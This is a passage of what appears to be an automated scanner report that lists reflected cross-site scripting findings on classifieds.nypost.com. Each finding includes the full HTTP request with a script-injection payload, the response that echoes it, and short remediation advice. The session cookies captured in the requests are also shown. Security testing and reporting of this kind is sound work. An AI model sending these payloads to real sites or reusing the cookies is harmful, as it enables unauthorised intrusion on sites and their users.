Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale34569"-alert(1)-"97496bfe908/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.116. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d87"><script>alert(1)</script>0f7dd6cf8b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale47d87"><script>alert(1)</script>0f7dd6cf8b8/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale47d87"><script>alert(1)</script>0f7dd6cf8b8/" />
...[SNIP]...

1.117. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade76"><script>alert(1)</script>5ea0915938a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saleade76"><script>alert(1)</script>5ea0915938a/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/saleade76"><script>alert(1)</script>5ea0915938a/pet/" />
...[SNIP]...

1.118. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90f7"-alert(1)-"5004df81c40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /saled90f7"-alert(1)-"5004df81c40/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds saled90f7"-alert(1)-"5004df81c40/pet/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.119. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e868b"-alert(1)-"5f8d12acc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salee868b"-alert(1)-"5f8d12acc2f/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds salee868b"-alert(1)-"5f8d12acc2f/pet/-/-/10036","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.120. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e182a"><script>alert(1)</script>fff8b27e3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /salee182a"><script>alert(1)</script>fff8b27e3f/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/salee182a"><script>alert(1)</script>fff8b27e3f/pet/-/-/10036" />
...[SNIP]...

1.121. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e044"-alert(1)-"f441c0c204f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale3e044"-alert(1)-"f441c0c204f/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale3e044"-alert(1)-"f441c0c204f/tickets/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.122. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c054f"><script>alert(1)</script>415fffba3b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /salec054f"><script>alert(1)</script>415fffba3b2/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/salec054f"><script>alert(1)</script>415fffba3b2/tickets/" />
...[SNIP]...

1.123. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13816"-alert(1)-"284747a558c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service13816"-alert(1)-"284747a558c/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds service13816"-alert(1)-"284747a558c/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.124. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 432b1"><script>alert(1)</script>30b054d92d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service432b1"><script>alert(1)</script>30b054d92d2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/service432b1"><script>alert(1)</script>30b054d92d2/" />
...[SNIP]...

1.125. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

